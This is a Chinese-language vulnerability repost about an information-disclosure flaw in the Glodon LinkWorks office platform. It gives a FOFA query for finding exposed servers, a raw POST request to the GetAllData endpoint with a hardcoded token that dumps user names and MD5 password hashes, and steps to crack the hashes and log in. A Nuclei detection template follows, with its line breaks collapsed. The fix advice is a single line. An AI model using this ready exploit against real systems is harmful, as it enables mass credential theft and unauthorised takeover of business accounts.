免责声明：文章来源互联网收集整理，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

广联达LinkWorks（也称GlinkLink或GTP-LinkWorks）是广联达公司开发的一种BIM协同平台，广联达协同聚焦于建筑企业数字化运营，通过高度集成的数字化管理平台所建立的企业数字化生产、数字化经营、数字化管理、数字化服务流 ，构建横向集成、纵向贯通、端到端数字化的全新运营管理体系，并基于互联网、云计算建立起可视化的生产指挥平台、管控决策平台、产业链协同平台。

广联达-Linkworks协同办公管理平台 GetAllData接口处存在信息泄露漏洞，恶意可获取用户名密码等敏感信息。破解密码md5可登录后台。

Ⅱ、fofa语句

body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"

Ⅲ、漏洞复现

POC

POST /WebService/Lk6SyncService/MrMMSSvc/DataSvc.asmx/GetAllData HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; SM-P585Y) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencodedToken=!@#$asdf$#@!&DataType=user

1、构建poc

2、破解MD5值，登录系统

Ⅳ、Nuclei-POC

id:  GetAllData-readfileinfo:name: 广联达-Linkworks协同办公管理平台 GetAllData接口处存在信息泄露漏洞，恶意可获取用户名密码等敏感信息。破解密码md5可登录后台。author: WLFseverity: highmetadata: fofa-query: body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"
variables:filename: "{{to_lower(rand_base(10))}}"boundary: "{{to_lower(rand_base(20))}}"
http:- raw:- |POST /WebService/Lk6SyncService/MrMMSSvc/DataSvc.asmx/GetAllData HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; SM-P585Y) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedToken=!@#$asdf$#@!&DataType=usermatchers:- type: dsldsl:- status_code==200 && contains_all(body,"USR_CODE","USR_PWDMD5")

Ⅴ、修复建议

设置防火墙安全控制策略和白名单